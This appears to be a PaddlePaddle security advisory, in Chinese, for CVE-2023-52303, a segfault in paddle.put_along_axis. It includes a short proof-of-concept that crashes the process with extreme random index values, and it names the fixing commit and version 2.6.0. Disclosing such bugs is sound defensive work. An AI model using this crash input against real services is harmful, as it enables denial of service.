pdsa-2023-012_cn.md

PDSA-2023-012: Segfault in paddle.put_along_axis

CVE编号

CVE-2023-52303

影响

输入张量的维度异常时，paddle.put_along_axis会引发segfault，PoC代码如下：

import paddle
import numpy as np

paddle.put_along_axis(
    arr=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [1]).astype(np.int32)),
    indices=paddle.to_tensor(np.random.uniform(-9223372036854775808, 9223372036854775807, [1]).astype(np.int64)),
    values=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)),
    axis=0,
    reduce="assign"
)

补丁

我们在commit 19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。

更多信息

请参考我们的安全指南以获得更多关于安全的信息，以及如何与我们联系问题。

贡献者

此漏洞由 Tong Liu of CAS-IIE 提交。